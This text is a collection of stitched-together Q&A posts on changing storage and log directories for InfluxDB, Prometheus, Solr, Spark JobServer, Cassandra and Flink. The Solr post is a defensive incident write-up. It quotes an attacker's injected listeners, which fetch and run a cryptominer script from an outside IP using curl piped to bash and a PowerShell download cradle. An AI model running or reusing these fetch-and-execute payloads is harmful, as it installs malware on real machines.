I've installed the package from the official site following the instructions. By default, the physical location of the database folder is /opt/influxdb/shared.
I've tried to change the relevant properties in the config file and wrote them properly, but after that I can't start the influxdb service.
[storage]
dir = "/media/alex/Second/InfluxStorage/data/db" //my settings
How can I change the default database directory?
EDIT: This is for InfluxDB v1.x only. It has been reported not to work for InfluxDB v2.x.
Make a new directory where you want to put your data and give it the appropriate ownership, e.g.:
mkdir -p /new/path/to/influxdb
sudo chown influxdb:influxdb /new/path/to/influxdb
Edit the following three lines of your /etc/influxdb/influxdb.conf (/usr/local/etc/influxdb.conf on macOS) so that they point to your new location:
# under [meta]
dir = "/new/path/to/influxdb/meta"
# under [data]
dir = "/new/path/to/influxdb/data"
wal-dir = "/new/path/to/influxdb/wal"
Restart the InfluxDB daemon.
sudo service influxdb restart # Ubuntu/Debian
brew services restart influxdb # macOS/homebrew
Done!
In case you want to move existing data, simply copy it (the current location can be found in influxdb.conf; /var/lib/influxdb on Ubuntu/Debian) to the new desired location before editing influxdb.conf, and make sure the new folder has the appropriate permissions/ownership.
There is some information about backups/restores in the official docs, but plain copying worked for me.
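For example, a minimal sketch of the whole move on Ubuntu/Debian (using the example path from above):
sudo service influxdb stop
sudo cp -R /var/lib/influxdb/. /new/path/to/influxdb/
sudo chown -R influxdb:influxdb /new/path/to/influxdb
# edit the three dir entries in /etc/influxdb/influxdb.conf, then:
sudo service influxdb start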
The above was tested on InfluxDB v1.2 on macOS/Ubuntu/Raspbian.
For InfluxDB 2.0:
In InfluxDB 2.0 the data directories are below ~/.influxdbv2 by default.
There are actually two data stores: bolt (various key-value configuration data) and engine (the TSM database).
From the documentation, to change the location of the bolt database:
Default: ~/.influxdbv2/influxd.bolt
influxd flag: influxd --bolt-path=~/.influxdbv2/influxd.bolt
Environment variable: export INFLUXD_BOLT_PATH=~/.influxdbv2/influxd.bolt
Configuration file: bolt-path: /users/user/.influxdbv2/influxd.bolt
From the documentation, to change the location of the engine database:
Default: ~/.influxdbv2/engine
influxd flag: influxd --engine-path=~/.influxdbv2/engine
Environment variable: export INFLUXD_ENGINE_PATH=~/.influxdbv2/engine
Configuration file: engine-path: /users/user/.influxdbv2/engine
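Putting the two together, a sketch of a config file for influxd could look like this (the keys are the documented ones above; the paths are just examples):
bolt-path: /media/alex/Second/InfluxStorage/influxd.bolt
engine-path: /media/alex/Second/InfluxStorage/engine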
We are trying to replace the prometheus.yaml in /etc/metrics/conf because it contains outdated rules. We try to copy a new rules file:
RUN mkdir -p /etc/metrics/conf
COPY conf/prometheus.yaml /etc/metrics/conf/prometheus.yaml
But the rules are not picked up and Prometheus still ignores the new metrics.
The sad truth is that the folder and file are in fact already there (the file looks like a symlink to the /etc/metrics/conf/..data/prometheus.yaml location).
We had to work around it by copying the file to a new location:
COPY conf/prometheus.yaml /etc/metrics/conf2/prometheus.yaml
and adding a configFile parameter to the Helm chart:
configFile: "/etc/metrics/conf2/prometheus.yaml"
That makes the javaagent properties passed to jmx-exporter use the new prometheus.yaml location.
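For context, the resulting javaagent flag then points jmx-exporter at the new file; a rough sketch (jar path and port are assumptions, not taken from our chart):
-javaagent:/opt/jmx_prometheus_javaagent.jar=9404:/etc/metrics/conf2/prometheus.yaml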
Background:
My friend's site started to work slowly.
The site runs on Docker.
htop showed all cores loaded at 100% by the process /var/tmp/sustes running as user 8983. I tried to find out what sustes is, but Google didn't help; however, 8983 (Solr's default port) hinted that the problem was in the Solr container.
I tried to update Solr from v6.? to 7.4 and got the message:
o.a.s.c.SolrCore Error while closing
...
Caused by: org.apache.solr.common.SolrException: Error loading class
'solr.RunExecutableListener'
I rolled back to v6.6.4 (the only v6 available on Docker Hub: https://hub.docker.com/_/solr/), as the site had to keep working.
In the Docker logs I found:
[x:default] o.a.s.c.S.SolrConfigHandler Executed config commands successfully and persisted to File System [{"update-listener":{
"exe":"sh",
"name":"newlistener-02",
"args":[
-"c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"}}]
So at http://192.99.142.226:8220/mr.sh we can find the malware code, which installs a crypto miner (the miner's config: http://192.99.142.226:8220/wt.conf).
Via http://example.com:8983/solr/YOUR_CORE_NAME/config we can see the full config, but right now we only need the listener section:
"listener":[{
"event":"newSearcher",
"class":"solr.QuerySenderListener",
"queries":[]},
{
"event":"firstSearcher",
"class":"solr.QuerySenderListener",
"queries":[]},
{
"exe":"sh",
"name":"newlistener-02",
"args":["-c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"},
{
"exe":"sh",
"name":"newlistener-25",
"args":["-c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"},
{
"exe":"cmd.exe",
"name":"newlistener-00",
"args":["/c",
"powershell IEX (New-Object Net.WebClient).DownloadString('http://192.99.142.248:8220/1.ps1')"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"cmd.exe"}],
As we do not have such settings in solrconfig.xml, I found them in /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json (the settings from this file can also be seen at http://example.com:8983/solr/YOUR_CORE_NAME/config/overlay).
Fixing:
Clean configoverlay.json, or simply remove this file (rm /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json).
Restart Solr (for how to start/stop it, see https://lucene.apache.org/solr/guide/6_6/running-solr.html#RunningSolr-StarttheServer) or restart the Docker container.
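If Solr runs in a container, a sketch of both steps in one go (container and core names are assumptions):
docker exec solr-container rm /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json
docker restart solr-container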
As I understand, this attack is possible due to CVE-2017-12629:
How to Attack Apache Solr By Using CVE-2017-12629 - https://spz.io/2018/01/26/attack-apache-solr-using-cve-2017-12629/
CVE-2017-12629: Remove RunExecutableListener from Solr - https://issues.apache.org/jira/browse/SOLR-11482?attachmentOrder=asc
... and is fixed in v5.5.5, 6.6.2+, and 7.1+.
The attack was possible because http://example.com:8983 was freely accessible to anyone, so even though the exploit itself is fixed, let's...
Add protection to http://example.com:8983
Based on https://lucene.apache.org/solr/guide/6_6/basic-authentication-plugin.html#basic-authentication-plugin
Create security.json with:
{
"authentication":{
"blockUnknown": true,
"class":"solr.BasicAuthPlugin",
"credentials":{"solr":"IV0EHq1OnNrj6gvRCwvFwTrZ1+z1oBbnQdiVC3otuq0=
Ndd7LKvVBAaZIF0QAVi1ekCfAJXr1GGfLtRUXhgrF8c="}
},
"authorization":{
"class":"solr.RuleBasedAuthorizationPlugin",
"permissions":[{"name":"security-edit",
"role":"admin"}],
"user-role":{"solr":"admin"}
}}
This file must be dropped into /opt/solr/server/solr/ (i.e. next to solr.xml).
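Note that the sample hash above is the one from the docs for the credentials solr:SolrRocks, so after restarting Solr you can check that authentication is actually enforced (the first request should now be rejected, the second should succeed):
curl http://example.com:8983/solr/admin/authentication
curl -u solr:SolrRocks http://example.com:8983/solr/admin/authentication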
As Solr has its own hash checker (a sha256(password+salt) hash), a typical solution cannot be used here. The easiest way to generate a hash that I've found is to download the jar file from http://www.planetcobalt.net/sdb/solr_password_hash.shtml (at the end of the article) and run it as java -jar SolrPasswordHash.jar NewPassword.
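If you'd rather not run a downloaded jar, here is a sketch of the same hash with openssl, assuming the scheme really is base64(sha256(sha256(salt+password))) followed by the base64 salt; verify the output against the jar before relying on it:
PASSWORD=NewPassword
SALT_B64=$(openssl rand -base64 32)   # random 32-byte salt, base64-encoded
HASH_B64=$( { echo "$SALT_B64" | base64 -d; printf '%s' "$PASSWORD"; } \
  | openssl dgst -sha256 -binary | openssl dgst -sha256 -binary | base64 )
echo "$HASH_B64 $SALT_B64"            # paste this as the credentials value
# (on macOS, base64 -d may need to be base64 -D)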
Because I use docker-compose, I simply build Solr like this:
# project/dockerfiles/solr/Dockerfile
FROM solr:7.4
ADD security.json /opt/solr/server/solr/
# project/sources/docker-compose.yml (just Solr part)
solr:
build: ./dockerfiles/solr/
container_name: solr-container
# Check if 'default' core is created. If not, then create it.
entrypoint:
- docker-entrypoint.sh
- solr-precreate
- default
# Access to the web interface from the host, i.e. 127.0.0.1:8983
ports:
- "8983:8983"
volumes:
- ./dockerfiles/solr/default:/opt/solr/server/solr/mycores/default # configs
- ../data/solr/default/data:/opt/solr/server/solr/mycores/default/data # indexes
I am trying to set up Spark JobServer (SJS) to execute jobs on a standalone Spark cluster, deploying SJS on one of the non-master nodes of the cluster. I am not using Docker, but doing it manually.
I am confused by the help documents in the SJS GitHub repo, particularly the deployment section. Do I need to edit both local.conf and local.sh to run this?
Can someone point out the steps to set up SJS in the Spark cluster?
Thanks!
Kiran
Update:
I created a new environment to deploy the jobserver on one of the nodes of the cluster. Here are the details:
env1.sh:
DEPLOY_HOSTS="masked.mo.cpy.corp"
APP_USER=kiran
APP_GROUP=spark
INSTALL_DIR=/home/kiran/job-server
LOG_DIR=/var/log/job-server
PIDFILE=spark-jobserver.pid
JOBSERVER_MEMORY=1G
SPARK_VERSION=1.6.1
MAX_DIRECT_MEMORY=512M
SPARK_HOME=/home/spark/spark-1.6.1-bin-hadoop2.6
SPARK_CONF_DIR=$SPARK_HOME/conf
SCALA_VERSION=2.11.6
env1.conf
spark {
master = "local[1]"
webUrlPort = 8080
job-number-cpus = 2
jobserver {
port = 8090
bind-address = "0.0.0.0"
jar-store-rootdir = /tmp/jobserver/jars
context-per-jvm = false
jobdao = spark.jobserver.io.JobFileDAO
filedao {
rootdir = /tmp/spark-job-server/filedao/data
}
datadao {
rootdir = /tmp/spark-jobserver/upload
}
result-chunk-size = 1m
}
context-settings {
num-cpu-cores = 1
memory-per-node = 1G
}
home = "/home/spark/spark-1.6.1-bin-hadoop2.6"
}
Why don't you set JOBSERVER_FG=1 and try running server_start.sh? This would run the process in the foreground and should print the error to stderr.
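For example, with the install dir from the question's env1.sh:
JOBSERVER_FG=1 /home/kiran/job-server/server_start.sh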
Yes, you have to edit both files, adapting them for your cluster.
The deploy steps are explained below:
Copy config/local.sh.template to <environment>.sh and edit as appropriate.
This file is mostly for environment variables that are used by the deployment script and by the server_start.sh script. The most important ones are: the deploy host (the IP or hostname where the jobserver will run), the user and group of execution, the JobServer memory (it becomes the driver memory), the Spark version, and the Spark home.
Copy config/shiro.ini.template to shiro.ini and edit as appropriate. NOTE: only required when authentication = on
If you are going to use shiro authentication, then you need this step.
Copy config/local.conf.template to <environment>.conf and edit as appropriate.
This is the main configuration file for JobServer and for the contexts that JobServer will create. The full list of properties you can set in this file can be seen at this link.
bin/server_deploy.sh <environment>
After editing the configuration files, you can deploy using this script. The parameter must be the name that you chose for your .conf and .sh files.
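With the env1.sh/env1.conf files from the question, that would be:
bin/server_deploy.sh env1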
Once you run the script, JobServer will connect to the host entered in the .sh file and create a new directory with some control files. Then, every time you need to change a configuration entry, you can do it directly on the remote machine: the .conf file will be there under the name you chose, and the .sh file will have been renamed to settings.sh.
Please note that, if you haven't configured an SSH key-based connection between the machine where you run this script and the remote machine, you will be prompted for a password during its execution.
If you have problems with the creation of directories on the remote machine, you can try and create them yourself with mkdir (they must match the INSTALL_DIR configuration entry of the .sh file) and change their owner user and group to match the ones entered in the .sh configuration file.
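A sketch matching the INSTALL_DIR, LOG_DIR, APP_USER and APP_GROUP values from the question's env1.sh:
sudo mkdir -p /home/kiran/job-server /var/log/job-server
sudo chown -R kiran:spark /home/kiran/job-server /var/log/job-server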
On the remote server, start it in the deployed directory with server_start.sh and stop it with server_stop.sh
This step is self-explanatory: once you have completed all the other steps, you can start the JobServer service on the remote machine by running server_start.sh and stop it with server_stop.sh.
I'm trying to change the Cassandra data, commit log, and saved caches directories by defining a custom shell script for CASSANDRA_INCLUDE. I'm modifying the properties in the script as follows:
data_file_directories = "/usr/pic1/kearanky/cassandra/data"
commitlog_directory = "/usr/pic1/kearanky/cassandra/commitlog"
saved_caches_directory: "/usr/pic1/kearanky/cassandra/saved_caches"
When I run cassandra I get the error "data_file_directories: command not found". How can I modify the directories correctly?
PS: I don't have write access to cassandra.yaml and can't create the default directories it uses.
Per this answer: make your own cassandra.yaml with your custom directories, then run cassandra with the -D flag, pointing cassandra.config at your file's location,
or set the $CASSANDRA_HOME variable in your .bashrc and then run cassandra.
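A minimal sketch of the first option, using the directories from the question (note that cassandra.config expects a URL, not a bare path):
mkdir -p /usr/pic1/kearanky/cassandra/{data,commitlog,saved_caches}
cp "$CASSANDRA_HOME/conf/cassandra.yaml" /usr/pic1/kearanky/cassandra/cassandra.yaml
# edit data_file_directories, commitlog_directory and saved_caches_directory
# in the copied file, then:
cassandra -Dcassandra.config=file:///usr/pic1/kearanky/cassandra/cassandra.yaml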
I understand Flink uses log4j to manage its logs, so I changed the settings in log4j.properties, where I set the output location. However, when I start the job manager, it reports the changed log location instead of the default one. So how can I change the log location of Flink gracefully?
The default log directory is set via bin/config.sh. Look for FLINK_LOG_DIR. You can just update the script to change the default log directory.
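A sketch of the edit (the variable name comes from the answer above; the exact surrounding lines vary between Flink versions):
# in bin/config.sh, point FLINK_LOG_DIR at your own directory, e.g.:
FLINK_LOG_DIR=/var/log/flink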
Add the following line in flink-conf.yaml that can be found in conf directory of Flink installation:
env.log.dir: /var/log/flink
Where /var/log/flink is the directory you want to use for logs.
Note that Flink does not seem to support nested YAML syntax, so
env:
log:
dir: /var/log/flink
will not work!
Since 1.0.3 you can set env.log.dir to change the directory where the logs are saved.